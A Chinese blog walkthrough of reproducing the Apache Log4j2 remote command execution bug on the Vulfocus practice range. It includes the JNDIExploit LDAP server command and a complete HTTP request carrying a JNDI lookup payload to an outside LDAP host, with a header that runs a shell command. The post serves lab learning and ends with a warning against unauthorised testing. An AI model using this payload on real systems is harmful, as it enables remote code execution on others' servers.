【Vulfocus解题系列】手把手教你使用Vulfocus公开靶场对Apache Log4j2远程命令执行漏洞复现
前言
关于这个漏洞,啥都不用说了,直接发车。
工具下载
JNDIExploit:https://github.com/0x727/JNDIExploit
复现过程
-
启动靶场环境
直接用vulfocus启一个环境。
官网地址:http://vulfocus.fofa.so/
没注册的先注册,进来首页即可看到靶场
-
用JNDIExploit启一个ldap的服务。
-
命令如下:
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0
-
接着将payload更改如下:
payload=$注意Content-Type的类型为:application/x-www-form-urlencoded
在请求头中添加cmd字段,后面跟上需要执行的命令即可。完整数据包如下:
POST /hello HTTP/1.1 Host: vulfocus.fofa.so:41624 Content-Type: application/x-www-form-urlencoded cmd: whoami Content-Length: 47 payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
成功回显命令:
后记
本文章仅为学习交流,请勿利用从事非法渗透测试,否则后果自负,与本人无关。
本漏洞推荐使用公开靶场或自己搭建环境进行复现和研究,但切忌进行未授权测试。
本文作者:4andao
本文链接:https://www.cnblogs.com/4andao/p/15679365.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!